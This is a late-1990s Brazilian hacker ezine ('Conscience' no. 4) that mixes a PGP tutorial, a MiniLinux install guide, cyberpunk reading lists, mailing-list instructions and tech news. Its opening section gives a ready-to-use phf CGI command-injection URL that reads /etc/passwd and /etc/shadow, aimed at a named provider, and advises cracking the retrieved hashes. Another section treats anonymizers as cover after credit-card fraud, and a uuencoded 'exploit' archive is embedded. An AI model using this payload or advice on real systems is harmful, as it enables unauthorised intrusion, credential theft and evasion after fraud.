Ezine Conscience - n° 4
Feito por Silver-Ba - silver-ba@achei.net ou conscience@null.com
Http://www.geocities.com/Paris/Metro/6720
Nova HP -> Http://www.civila.com/brasil/conscience
Obs. Não mude o conteudo desse zine!!
Leia. Pense e invente! HeAvY FuN!!
Obs. para usar o zine, use a tecla page down e não a barra de rolagem!
Indice
- Introdução
- Acesso ao passwd via browser WWW (antigo)
- Anonymizer, um pouco de sigilo
- PGP - Criptografia
- Mini Linux - Uma saida...
- CyberPunk - Modo de Futuro
- Internet emotiva
- Exploits - texto em ingles (uuencodado)
- Emails Recebidos
- Links Diversos
- Mailing list de hackers
- News - Noticias
- Minha chave publica - PGP
- Consideraçıes finais, erratas e bibliografias
Introdução
Ok, ok, muito tempo né? Não tive tempo para continuar o zine, mas está indo, agora estou de férias e posso passar mais tempo fazendo esse zine.
Muita gente vem elogiando o Conscience, isso é bom, mas eu digo e repito: você não vai aprender tudo o que precisa aqui, estou apenas dando uma ajuda, e existem muitos lugares onde você pode achar mais coisas sobre hackers e computação.
Está saindo agora uma nova lista de discursão para hackers, ela está sendo organizada pelo derneval, editor do barata eletrica, e é uma boa ideia reunir o pessoal, pra trocar ideias e experiências e etc...
Tambem estou querendo avisar que talvez tenha que mudar a hp de lugar a nova homepage será em www.civila.com/brasil/conscience, a da geocities vai ficar lá sendo atualizada tb (alguem possui um servidor de ftp para colocar os numeros do conscience? :))
Muita gente vem me pedindo para ajudar no zine, pode até ajudar... mas contanto que não seja lista de senhas, papo-furado, codes de virus etc :) e o material passa pela minha "avaliação" antes de ser publicado... :-)
Obs1. Não achei outro zine interessante, portanto não tem seção Outros Ezines Obs2. 1043 visitas no site durante o fim da produção do ezine!! :)
- Silver-Ba -
Acesso ao passwd via browser
Apesar de velha isso as vezes funciona, os servidores mais antigos ainda possuem esse bug, e muita gente já conseguiu senhas por aqui, sei que não pode ser de muita serventia mas que é interessante é...
1) a dica é usar o /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd é o seguinte: pegue o end. www de um provedor (ex. http://www.tropeiro.com.br) e coloque no final a linha, assim:
http://www.tropeiro.com.br/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Se der certo vai aparecer a passwd e ai é so desencriptar...
mas se estiver com shadow (no lugar da senha aparece algo como um x), em vez de /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd coloque outra linha:
/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/shadow
Mas já é dificil achar servers que ainda aceitem isso, esse bug não funciona mais como antes.
- Silver-Ba -
Anonymizer
Quando você entra na internet um numero ip é atribuido a você, ele se parece com o seguinte: 200.200.200.200 - mas é claro que varia de um computador para o outro, alem dele existe tambem o host, vamos dizer que seu procedor é o Interprov (inventei agora, se existir mesmo um provedor com esse nome é coincidencia), quando voce se conecta nele, vc ganha um host mais ou menos assim: line04.interprov.com.br - o line04 é sempre o que varia, mas essa regra não é unica, sempre tem casos a parte. Agora vamos dizer que você usou um gerador de cartão de credito (N√O ACONSELHO ESSA PRATICA, é so um exemplo) e quer entrar em um site pago, coloca o numero falso do cartão e pronto! Você está dentro do site com senha e tudo... mas depois que o pessoal do site for pegar o dinheiro e ver que o numero é falso, eles vão nos logs (são arquivos que guardam informaçıes dos usuários) pegam seu ip é host, contactam o provedor, e voce foi pego.
Para simplificar, você nunca tem sigilo sem tomar as precauçıes que deve, na web, existe o Anonymizer (www.anonymizer.com) lá voce coloca a URL que quer ir e ele "muda" seu host e ip para enganar o site.
Não tenho certeza do grau de segurança que o anonymizer proporciona mas pelo que sei ele é bom...
- Silver-Ba -
PGP - Criptografia
O que é criptografia? Bom é uma maneira de você garantir que seus dados estejam em segurança, ou que eles so serão vistos por determinadas pessoas. A maneira como isso acontece (Pelo menos no rpograma PGP, que vamos ver agora) é a seguinte: você tem uma "chave secreta" e criptografa uma mensagem, manda pro destinatário e ele possuindo uma "chave publica" tira a criptografia da mensagem tornando-a possivel de ser lida.
Mas pra que serve a criptografia? Bom se você precisa mandar uma denuncia ao governo, mandar uma mensagem comprometedora, ou até uma carta simples, mas que voce so quer que o destinatário da mensagem leia, voce so precisa colocar em codigo (lembro que minha prima fazia um codigo para cada letra e usava-as para escrever seu diario, é mais ou menos isso) e pronto.
Nessa edição vamos usar um dos programas de criptografia mais usados na internet, e acho que o melhor...
Quão segura é uma mensagem encriptada por PGP? Podemos afirmar que é muito segura. O PGP utiliza um algoritmo chamado RSA de encriptação por chave pública. Um ataque de força bruta ao RSA é impensável. Estima-se que uma rede de um milhão de computadores Pentium 133MHz levaria cerca de 25.000 anos para quebrar uma única chave de 1024 bits. Quem quiser saber mais detalhes sobre a segurança do PGP e outras formas de ataque, leia a documentação ou acesse o endereço http://axion.physics.ubc.ca/pgp-attack.html.
- Silver-Ba -
O que você acha de mandar uma carta confidencial e saber que ela foi aberta pelos correios? Situação dificil, ainda mais quando os assuntos eram de grande sigilo... no email tambem é assim, e por isso existem as ferramentas de criptografar, com ela você se sente mais seguro :)
Um dos mais usados e acho que o melhor é o pgp, é muito facil de arranjar ( tem até em portugues), funciona a base de comandos e aqui vai algumas dicas de como usa-lo:
a) CRIANDO SUA CHAVE
Uma chave são os codigos que dão "patente" a sua mensagem, assim é provada que a mensagem é sua :-)
1- Para criar uma digite: pgp -kg
2- Depois escolha o nivel de segurança (vai de 1 a 3)
3- Coloque uma frase senha (em vez de uma palavra só, é uma frase)
4- Digite SEU_NOME <seu@email.com>
b) TESTANDO SUA CHAVE PARA CRIPTOGRAFAR ARQUIVOS PARA SI MESMO
1- Crie um arquivo texto com algumas frases
2- Digite: pgp -e arquivo.txt SEU_NOME
Pronto, o arquivo vai ficar assim: arquivo.pgp - Mas a intenção é criptografar para mandar textos para outras pessoas, e não para você mesmo (apesar de isso ser util)
c) ADICIONANDO UMA CHAVE DE OUTRA PESSOA
1- Pegue minha chave que vem nessa edição e copie para um arquivo separado, depois salve-a.
2- Vá no pgp e digite: pgp -ka nomedoarquivosalvo
3- digite sua frase senha e pronto
d) DESCRIPTOGRAFANDO UM TEXTO
1- Pegue o texto abaixo, copie para um arquivo e salve-o
-----BEGIN PGP MESSAGE-----
Version: 2.6.3i
owGtUk1IFVEUfqIVb2AWFlgUxHkYEpUzIdKPiJiSCZU+yIgsxPtmjq/7mLl3uPfO
vIhCpCisoEW0UqNIIoLEyE3hLghC3Qi1kDYPF0HUJqE2Ed2ZUl+LNua3GIaZ7zvn
O985w6l7lRtSDR/qQJZ21n0+0+ZXVDQ9r0qN3xr5OfDG3dYPU/cP1xiXn5xv25W5
Mlvtv16aecdsnJjrnZqe31zoKEywMXej2vJjfGzw3LdHhaoaMXS8f/TO0O7uyT3N
X2fSb1se93qF6Oam09Vbb8w/HBxZaDhUUrcrxNzVnunrL/qat1tfRoen3l972Vf3
qfJu7dMHkzuWFp5Vfs+lFUqFlrqoUhq16wnTqE0vAzT+fDh6iTKEds6kQ5E5CPXA
XkFjTCqjwX8gqdCBVHEIuIBT1ItQ1LcR3Un+fs+RVuJcQGoxVMBDcFbctLLQ8yyH
+yuFlqt2KhU02XaxWLTyyB2qKMqYaGeJoNI+iUpw+8DBhv2r0wJ08YhAZxbqW9Ll
BRwaUY8k6pwg2pS96iD9VwrdOWlB1yIHP3QReOxUYehycFFKhDjLTAbKNOVBnEBK
LMgi00wEyiLU4gx04pHoLHSEXVr5zwDX9xJMY+8aYBrJkAgkQEYkhD4k5woBEQQi
ro/HNEggkLkogEAoidAZBfnANLQuIWh+CTzN4ECl5PsSbU5HYhrJ/zh4zIc0zKzV
o2n0rJpqFzRQPC/IAPm4GG8JfN2L5NGHAD0O2WNZ09AXo+J9KNRE/QSXALo0FrDQ
R8Gh0TTYYny+uoDUs7lUKkFzIdVMiXEnl/jxNtdm+hc=
=B4M5
-----END PGP MESSAGE-----
2- Depois digite: pgp -d nomedoarq
3- Será criado o arquivo descriptografado
e) CRIPTOGRAFANDO UM ARQUIVO PARA MANDAR POR MAIL
1- Pegue o arquivo texto a ser criptografado e digite no pgp: pgp -sa nomedoarq
2- Será criado algo como nomedoarq.asc que contem algo como o texto criptografado acima.
f) PARA DISTRIBUIR SUA CHAVE PUBLICA
1- Para isso digite: pgp -kxa SEU_NOME chave.asc
2- Será criado o arquivo chave.asc com sua chave para ser distribuida
ATEN«√O: Se SEU_NOME tiver mais de 1 palavra, o que é provavel, sempre coloque tudo entre aspas
3- Peque o arquivo e abra no bloco de notas ou outro editor, e pronto sua chave estará lá agora basta apenas distribui-la
- Silver-Ba -
MiniLinux
Nem todo mundo pode renunciar aos produtos micro$oft e ter o linux no computador, criar uma partição dá dor de cabeça se não souber fazer direito... então o que fazer? Bom uma das soluçıes é o uso da distribuição minilinux, que foi concebida para em pouco espaço (são cerca de 5MB os arquivos de instalação) fornecer algo poderoso, como ele é possivel usar xwindos, conecção a internet e outras coisas mais, e o melhor (sera?) roda sob o dos.
Para arranjar e instalar ai vai as dicas:
- Pegue os arquivos: MINILIN1.ZIP MINILIN2.ZIP MINILIN2.ZIP MINILIN1.ZIP e MINILINX.EXE
- Depois execute o MINILINX.EXE e leia o arquivo readme (acho que o nome é esse) se ler já deverá saber como se faz o resto mas vamos continuar.
- Descompacte os outros arquivos, pegue o fcut (que vem no MINILINX.EXE ) e pelo dos digite fcute -j linux - esse comando vai gerar um outro arquivo o
- linux.zip descompacte e pronto
- Se ainda tiver duvidas leia o arquivo texto que vem junto.
- Silver-Ba -
CyberPunk - Modo de Futuro
Cyberpunk é um nome dado a um segmento literário que começou por volta dos anos 60/70, o termo só pegou em 1984 quando Willian Gibson ganhou os premios Hugo, nebula e Philip K. Dick com o seu livro Neuromancer.
A maioria das obras mostravam o futuro como um lugar com redomas protetoras de vidro e etc, mas o que se viu em Neuromancer foi diferente, nos livros de Cyberpunk ainda existiam as tais cupulas, mas eram de propriedade de corporaçıes, governos, e militares que primeiro atiravam e depois perguntavam quem era.
De acordo com uma sinopse dos livros dessa categoria, pode-se ver que o futuro Cyberpunk existe vida das ruas e esgotos (?!) até os mais altos predios futuristas, e só para ter uma ideia a estimativa de população de cidades como Nova York e Toquio, está na casa dos 20 milhıes!
Cyberpunk é a interação de coisas organicas e inorg‚nicas, a total interação do homem com a maquina, um implante chamado "cybernetico" seria tão comum quanto uma cirurgia plastica hoje.
Com a ideia de tecnologia altissima, podemos observar que em alguns casos podemos ver computadores que atingem a autoconsciencia (já viram o filme TRON?).
Existe muito mais desse universo espetacular e imaginário chamado cyberpunk e muitas coisas falam sobre esse assunto.
Aqui vai uma lista que mostra angulos diversos do mundo cyberpunk:
Livros:
- Burning Chrome, Willian Gibson
- Island in the NET, Bruce Sterling
- Neuromancer, Willian Gibson
- Schismatrix, Bruce Sterling
- ShockWave Rider, John Brunner
- Gurps Cyberpunk, Steve Jackson
- Visıes de um robÙ, Isaac Asimov
Quadrinhos e Grafic Novels:
- Akira
- Dirty Pair
- Judge Dredd
- Cyberpunk
- Time 2
Cinema e Televisão:
- Blade Runner
- Max Headroon
- TRON
- A Clockwork Orange
- Liquid Sky
- FutureWorld
- Hands of Steel
- The terminal man
Revistas e Boletins eletronicos (ezines):
- 2600 magazine
- Cybertech
- Mondo 2000
- Legion of Doom Technical Journal
- The Illuminaty BBS (001-512-447-449) (Internacional! Cuidado com a conta)
- Isaac Asimov's Magazine of Science Fiction
- Silver-Ba -
Internet Emotiva
Eu já tinha pensado em escrever isso, mas tinha achado que não tinha a ver com o zine, mas depois, na hora do fechamento da edição eu tomei a decisão e acabei escrevendo.
Desde que eu comecei a usar a internet, conheci muita gente, mas muita mesmo, conversei e converso muito no irc, até pessoas da internet eu consegui ver cara a cara. A internet não é apenas uma rede de computadores com maquinas, programas e etc, mas atras de cada computador existe uma pessoa, uma vida como a sua, aprenda a respeitar a todos, do mais alto administrador do melhor server que voce já viu, até o iniciante que não sabe nem usar o netscape.
No fim todos acabam sendo seus amigos, e ter amigos é importante, não são apenas "contatos" em que você procura apenas dar e receber favores, mas amigos de verdade que aceite conversar outras coisas alem de internet, hacking e coisas do genero.
Aproveitem bem a oportunidade que vocês tem de usar isso, muita gente está querendo mas não pode, pode ser até que eu esteja forçando a barra ou falando besteira mas não é facil quando uma pessoa que você sabe que talvez nunca possa usar a internet, lhe pergunte: "como é lá? Gostaria de poder ver..."
Por isso aprendam, usem, e aproveitem, pois todos somos privilegiados com essa maravilha que é a internet, uma rede de humanos.
- Silver-Ba -
Exploits
Achei interessante colocar esse pequeno texto sobre exploits, só precisa saber o basico de ingles, mas se pedirem eu posso traduzi-lo.
Obs. Ele está uuencodado, usem o programa uudecode que vem na edição numero 1 do Ezine Conscience.
begin 644 exploit.zip
M4$L#!!0``@`(`%6G+B)HC"A<!P4``!(+```+````97AP;&]I="YT>'1E5DVO
MVS80O!O0?]A#"S>`K!3M*:^'MD@+U)<&:/J07"F)MEA+I$)23U$/_>V=78JR
MG.229Y'[.3.[/)U.]/OGL7<F!CJ=3L6A.-"OO8OD+C1J-_::5+C1@/]J-T72
MZ^62YDY%BIU>2'F]_]FZDI1MJ7-S<9`O4]!\-%3T0?=]2>?C0+,WT=@KOIL`
MDV8:M(4#)Q&4L>G@XCS\C/HR]?U2'(:%>A5PS0RZHG,\!OIGPN\0E4_>'-4.
MH3QG'#FE,W7J17_IN#CH%^T7]B/9.$O&-R4%1P87W'3MI!JO*>!7WU*-#E#4
MGV/VDY)'4<4A526W3203*FEC_G>BP:B./Z'!](&30F6*CKGS^.OGK?GLZZLV
M!#.,_8*V;B;B8?3NZM60"CUF:(XXJ:=K<8"UHC#JQEQ,@](N<094%?#M-QP9
M/&K-Y8+D;2PS@O=/G("]<L/6R/<3!`FE!`^`?WGTJ?I^5DO8<LQYH#=WQO'%
M0;4"SU5'\HZ99W<Q@+U7`FU80M1#J.AOX5S3F1?-_$(GZBTV7Y3J"<7GBI&<
MYD;J^Q<8^<D*ABI(V(J*P]G2\Y_GCQ274=.[]\=0WBT&M6Q,@FDVH^\(%'T^
M_T;?TRL.ZGP+]D57')`YZ#OL,8BL)4&K4=;"&JQ:K^F672J;V`O%^(K>@\TJ
MF$8)^;F`#$+C5>AT>"QJ[@SD^D5=TEJTBA8WR?5:JRD:"*HXR#D`&L98K=0K
MR;IY5<X15LJ&&4BT]&G2(1IG`_#1HN\XNR3EJUNE-SA8`#ZN/M^G'ZM,_3_@
M&=0ZRSQ0N98[]=\;V^A'%C6N16RT]2V]>?,M#R4N@65;2D%6<]^@45:-2R#7
M[G-QX$-VL.6VSJ"M@\Z6].ZOG1<>'??N26/5P#1`)U/SX9BR7Q5!QC'/G$XU
MMT>X'AV/4URAFGP#UG)9)1-'W!JK_,)%PL2OM:BF<9-%%UKC2Y",O<TJ3<C4
M/HZI6_92''('F%+L)`U.T<;3*_!R34'*WD5)28**=(DC7^(C>$NQ!>0)W5(M
M6PHG(&G).]MQ*OY?,I>M,5-(&FR-ZJ<1HI)(X(`VPFSQ8-:IBB!?3V<7Y$.:
M.T*KJ>E@$WF8Z!@A=A46)NP[Y@L'3DX>T*4]8K(D,A@-^,Y",=#\<Y@8+;Y4
M'&89]/EX[ZXW-P;O)Z9IW:ONZ;_7WUR;)I]7C?!7.K2NB^Q%FIVOL0)X[Y2R
M342SR<8-.VF#&QZ,X]-@M;HM&!&!-R[C(9DPG*:Y<97KCIX[C&R'=MY8OF]E
MD<DHGTT/H7,`%DT`RS!9TNC&W]+F+33/\BG0!`&HVO2,HXFK+M9Z6F8Y-@O6
M@(,W0"N\R5%ET`+'A6UG``[=/KWB)\4EZL3VY$A\\]ZWJY"W+:OJ7@H4R'C0
M[G'@#H`'#)6_26V<&WM)H<633MCMAQN_15+C62'JB_V7U,UJ3ST>#&]_KS]-
M9K\<.?4!YTA>A[RQ^`7`?W-"U7W'\U.`]7&62WM\PS;O9-/_D&=:#8RY=0V#
ME`A]@0I;4?)CMEV,X]/KU_!<,;VJ?%HA0?#&MMN5>9XK[D/2H!SG%YN\D^CJ
MM>)2TV`*G,P]%H*G;60L;RC%XWRK\:VS30^Q@X/[ITMZ#V2ALG*SL@.E)Q?+
MFA:UR5&X\_BX1)#S95U8QM[0Q94>AF.VO'Z6KU-+E-&#,KV\5P4<]*-M49\\
M1%X,;Y-:]VZ6.OA=]HO,41_@N.8._0]02P$",@L4``(`"`!5IRXB:(PH7`<%
M```2"P``"P`````````!`"``MH$`````97AP;&]I="YT>'102P4&``````$`
,`0`Y````,`4`````
`
end
-----------------------------------------------------------------------------
Se não souber usar o uudecode, leia as ediçıes anteriores do ezine.
Esse texto é de autoria do miah - miah@hackersclub.com, toda a responsabilidade e creditos do texto são dele.
- Silver-Ba -
Emails
Estou respondendo alguns emails que me mandam, as vezes as duvidas de uns são as mesmas de outro :)
To mandando esse mail pra falar q GOSTEI MUITO de seu fanzine. Das zines q eu jah peguei foi a sua q eu + gostei. Eu peguei o ???? tb, mas eu achei q o ???? eh pra quem jah tah com um conhecimento mais aprofundado nas linguagens, hack, phreak, por isso q eu gostei do seu, pq ela esplica melhor pra quem tah iniciando.
Ah! Estou mandando esse e-mail tb, para q vc na sua proxima fanzine(q eu espero q tenha), vc explique melhor como se usa o cracker jack, mais detalhado, pq eu "downloadiei" o mesmo, mas naum consigo usar.
VAleu! Espero o Proximo N°!!
Ass: Marcio ???????!
Bom marcio, o cracker jack, já foi muito explorado em outros zines, e por isso não colocarei uma materia sobre ele, acho que no ezine que vc mencionou tem uma materia sobre o dito.
- Silver-Ba -
-------------------------------------------
Queria dar os parabens pelo belo zine underground desenvolvida por você, apesar te ter lido um pouquinmho atrasado. Mas, tudo é válido
Eu tenho a Cons-01 e 02, existe alguma mais recente que essas? Eu eu pego?
Os numeros do Conscience sempre podem ser pegos na hp dele:
Http://www.geocities.com/Paris/Metro/6720
obrigado pela atenção
De nada :)
Mandem seus email! :-)
Links Diversos
Ai vão alguns links uteis, só não sei se todos estão funcionando ainda, alguns são do meu bookmark antigo :)
- The National Cryptologic Museum http://www.nsa.gov:8080/museum
- Home page da versão internacional do PGP (com FAQ e documentação on-line): http://www.ifi.uio.no/pgp
- O maior servidor de chaves públicas de PGP está em: http://pgp5.ai.mit.edu/ ou http://pgp.ai.mit.edu
- Download do PGP em portugues: ftp.ifi.uio.no/pub/pgp/lang/pgp/236i-brazilian.zip
- Ideia de compilador (Portugol) com comandos em portugues http://www.dct.ufms.br/~wnagai/PGL/Portugol.html
- Criptografia http://www.visao.com.br/people/aver/ucsmain.htm
- Um monte de coisas para linux http://www.linuxnow.com/
- Homepage de um amigo meu. Sobre computação http://www.persocom.com.br/200k/
- The linux Manual (em portugues) http://www.netdados.com.br/tlm/
- Conectiva RedHat Linux - CRHL http://listas.conectiva.com.br/crhl/
Lista
Para facilitar a vida de quem quer entrar na lista de hackers que o editor do barata eletrica criou, vou copiar as instruçıes dele... Obs. Tudo abaixo são palavras dele
------ + ------
Nao sei se vai ter o mesmo sucesso da anterior, que estava hospedada na esquina-das-listas, que todo mundo sabe, ja era. Pra se inscrever, va ate o url: http://www.coollist.com e se inscreva la na lista hackers.braz (nao confundir com a lista hackers, que tambem existe, tem alto volume de correspondencia, mas ta cheia de wannabe e lammer, alem de ser em ingles).
Ao se inscrever, voce ira receber um email igual a este (mais ou menos) pedindo pra voce mandar um reply de confirmacao:
Date: Thu, 25 Sep 1997 20:33:01 -0400 (EDT)
To: fulano@rocketmail.com
From: subscribe@coollist.com Add to Address Book
Subject: Confirmation of SubscriptionWe have recently been requested by you to subscribe to this
List:
Please confirm that you want to subscribe by replying to this message.
If this subscription is unsolicited, simply delete this message.
Thank you.
----------------------------------------------------
Get a FREE Mailing List at http://208.141.98.157/
Para se desinscrever, manda email para unsubscribe@coollist.com
A resposta deve ser:
Date: Fri, 3 Oct 1997 23:48:09 -0400 (EDT)
To: fulano@rocketmail.com
From: unsubscribe@coollist.com Add to Address Book
Subject: Unsubscribe RequestTo unsubscribe from a Coollist Mailing List, just reply to this message and enter the name or the email address of your list between the square brackets:
List: [ ]
eg The address of the mailing list you post to
Then enter an "X" in the box below:
[ ] UNSUBSCRIBE
You will be unsubscribed instantly. Thank you.
--------------------------------------------------------
Get your FREE Mailing List. http://www.coollist.com
O que rola e que a pessoa querendo se desinscrever coloca o nome da lista onde quer se desinscrever, tal como:
List: [hackers.braz ]eg The address of the mailing list you post to
Then enter an "X" in the box below:
[X] UNSUBSCRIBE
Tudo isso e manda o reply de volta. Ai voce esta fora da lista.
A confirmacao de inscricao ou des-inscricao vem depois, como por exemplo:
Date: Sun, 28 Sep 1997 08:56:17 -0400 (EDT)
To: Fulano de Tal
From: hackers.braz@coollist.com Add to Address Book
Subject: You have been subscribed
Note: This is an automated ResponseCongratulations! You have been subscribed to the hackers.braz list.
To post to this list, just email your posting to "hackers.braz@coollist.com"To unsubscribe from this list, just send a blank email to: unsubscribe@coollist.com
If you did not ask to be subscribed, please send this email to nospam@coollist.com
If you encounter any problems at all, email support@coollist.com
Thank you and Have fun!
------------------------------------------------------
Get your FREE Mailing List. http://www.coollist.com
Detalhe importante:
Esta lista pode ou nao se tornar uma sucessora da lista hackers. Tudo depende de quem estiver afim de se inscrever ou nao. Eu considerava a lista hackers como um ponto de encontro, onde todo mundo podia ter uma chance de se comunicar. Espero que o pessoal entre nessa.
---------------------------------------------------------------------------
Obs. a proposito, na edição n° 3 do Conscience, existe uma materia sobre a coollist.com
News
VANTAGENS DA TELEFONIA NA INTERNET
As vantagens que a telefonia Internet tem sobre a telefonia convencional vao alem do simples fato de ser mais em conta.† Utilizar a Internet em vez das redes convencionais tambem significa um avanco tecnologico:† "Originalmente, pensava-se que a oportunidade de se utilizar a telefonia Internet significava apenas economia de custos e que a vantagem desapareceria tao logo as tarifas telefonicas convencionais ficassem mais em conta", disse um gerente sr. da Andersen Consulting.† "Descobrimos agora que a telefonia Internet tem uma vantagem de longo prazo; trata-se da economia que se obtem na aquisicao de equipamentos com custo mais baixo.† 'A medida em que os membros da industria de computadores estejam envolvidos, eles provocarao a economia nos custos proveniente de seu ramo altamente competitivo.† Basicamente estamos falando de uma rede de comunicacoes construida em principios da industria de computadores e nao apenas em principios de telecomunicacoes".
Tele.com† nov 97
-----------------------------------------------------------------------------
O ESTADO DO TEXAS DOS EUA PROCESSA MICROSOFT
O estado do Texas - onde fica a matriz da Compaq e da Dell, duas das maiores fabricantes de computadores do mundo, esta' processando a Microsoft por interferir na investigacao do estado de possivel infracao da lei anti-monopolista da Microsoft, e os representantes do estado estao furiosos com a Microsoft por esta nao liberar os fabricantes das clausulas de "sigilo" contidas nos contratos de licenca.† O procurador do geral do estado comentou:† "O dominio exagerado de mercado exercido pela Microsoft intimida os fabricantes de computadores, cuja sobrevivencia depende essencialmente do acesso ao software de sistema operacional da Microsoft, que roda em 90% de todos os computadores pessoais vendidos hoje em dia.† Os fabricantes estao com medo de passar informacoes porque nao ha' como eles as passarem confidencialmente".† A Microsoft responde:† "Permanecemos dispostos a discutir quaisquer conciliacoes que acomodem adequadamente os interesses da Microsoft em relacao 'a divulgacao de informacoes potenciais de sua propriedade...† O codigo e os termos sob os quais se licencia esse codigo a outros constituem ativos criticos de qualquer empresa que esteja no ramo de software.† Assim sendo, e' muito importante que se assegure a protecao adequada a esses ativos".
New York Times 8 nov 97
-----------------------------------------------------------------------------
EMPRESA COMERCIALIZA REPARO PARA ULTIMA FALHA DO PENTIUM
Uma pequena empresa chamada Freedom Fighter anunciou que desenvolveu um reparo para a ultima falha descoberta no chip Pentium.† O software F0 Figther foi projetado para trabalhar com os sistemas operacionais† Windows 95 ou com o NT e detecta e elimina a causa do problema antes que ele cause qualquer prejuizo.† Enquanto isso, a Intel afirma que ainda esta' trabalhando em um reparo e espera ter novidades no comeco da semana do dia 17 de novembro.
InfoWorld Electric 12 nov 97
-----------------------------------------------------------------------------
GRAVES CRIA O LEARNING TECHNOLOGY RESEARCH INSTITUTE
O ex-bolsista visitante do Educom, William H. Graves, abandonou a Universidade da Carolina do Norte em Chapel-Hill, onde havia fundado o Institute of Technology (instituto de tecnologia) e criou o Learning Technology Research Institute (instituto de pesquisa de tecnologia de aprendizagem), uma organizacao sem fins lucrativos concentrada em ferramentas de software e em metodologias.† O novo Instituto estara' localizado perto da area do Research Tringle Park na Carolina do Norte, e tera' um relacao estrategica de negocio com o Collegis, um provedor de solucoes de tecnologia para o mercado de ensino superior.
UNC News 3 nov 97
-----------------------------------------------------------------------------
Obs. Todas as noticias foram extraidas da EDUPAGE
Minha Chave publica do PGP
Quem usa o PGP e quiser me enviar mensagens mande-me a chave publica, e se receberem uma carta criptografada minha usem a minha chave que está abaixo (Obs. não pensem que conseguiram meu nome verdadeiro, é pseudonome :)
Type Bits/KeyID Date User ID
pub 1024/EC57426D 1997/01/13 Ricardo Silver Andrade <silver-ba@achei.net>
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i
mQCNAzLajasAAAEEANe1SSaY5NAC39Ci3TGMWRsw8k1i+P7G9xWU8cP9ex3yrqkm
17rxW5TvOWV4n/PUswKeOeqjDWiLhBMuCgF1LDexvS9W9Ak1fIBa55rrWMDsrGRO
nHwh6r8hXzHLhip6Rq/2z4d8mfJtebeLQJY5QMBj8Ss2NrUZy3PhHibsV0JtAAUR
tCxSaWNhcmRvIFNpbHZlciBBbmRyYWRlIDxzaWx2ZXItYmFAYWNoZWkubmV0PokA
lQMFEDLajatz4R4m7FdCbQEBry4D/iBdeIVRCxhCOHkL4aqgcrKnajP+irBTOZ8M
XBr8c67eod+TUKG/R0QSxACEKdvixQLO6E7UQi2p0vQXs5a2OQmfRg0RG4Fc5UKe
HWqDW3XVCGMSYnlPX51MMSMczc2u3mIhzOnmx70zDiZj78TO6zokaNx5/Um4tJE6
5noKcJix
=sLtX
-----END PGP PUBLIC KEY BLOCK-----
- Silver-Ba -
Consideraçıes finais e Bibliografia
Para a Materia PGP - Criptografia, foi usada como referencia o arquivo:
- PGP(tm) User's Guide - Volume I: Essential Topics em .doc, que tambem pode ser encontrado em portugues pela net:
- Tradução de ROBERTA PAIVA BORTOLOTTI <roberta@nimitz.ibilce.unesp.br>
- Revisao de Adriano Mauro Cansian <adriano@nimitz.ibilce.unesp.br>
Outras Publicaçıes sobre o assunto (se tiverem a oportunidade de ler):
- Bruce Schneier, "Applied Cryptography: Protocols, Algorithms, and Source Code in C", John Wiley & Sons, 1993. (Este livro e' um trabalho inicial sobre o assunto)
- Dorothy Denning, "Cryptography and Data Security", Addison-Wesley, Reading, MA 1992.
- Dorothy Denning, "Protecting Public Keys and Signature Keys", IEEE Computer, Fevereiro de 1993.
- Martin E. Hellman, "The Mathematics of Public-Key Cryptography", Scientific American, Agosto de 1979.
- Steven Levy, "Crypto Rebels", WIRED, maio/junho de 1993, pagina 54. (Este e' um artigo essencial sobre o PGP e outro topicos relacionados.)
- Ronald Rivest, "The MD5 Message Digest Algorithm", Laboratorio do MIT da Ciencia da Computacao, 1991.
- Xuejia Lai, "On the Design and Security of Block Ciphers", Series ETH sobre Processamento de Informacao (Ed. J. L. Massey), vol.1, Hartung-Gorre Verlag, Konstanz, Suica, 1992.
- Philip Zimmermann, "A Proposed Standard Format for RSA Cryptosystems", Avancos na Seguranca de Computadores, vol III, editado por Rein Turn, Artech House, 1988.
- Paul Wallich, "Eletronic Envelopes", Scientific American, fevereiro de 1993, pagina 30. (Este e' um artigo sobre o PGP)
- William Bulkeley, "Cipher Probe", Wall Street Journal, 28 de abril de 1994, primeira pagina. (Este e' um artigo sobre o PGP e Zimmermann)
Outras bibliografias
Mario Valente, "MiniLinux", Esoterica, mvalente@esoterica.com, 1995
Steve Jackson, "Gurps Cyberpunk", Steve Jackson Games, 1990
Ultimas palavras
Bom aqui está a edição 4, espero que tenham gostado... mandem mails dizendo como está o zine... mas lembre-se se for criticar, faça algo melhor antes :-)
Se não conseguir pegar os outros ezines no site que fica na geocities então tente na nova homepage, que está no cabeçalho do ezine.
A proposito, numa edição eu falei do shell na cyberspace, antes o host era ftp.cyberspace.org, mas mudou e hoje é cyberspace.org
- Silver-Ba -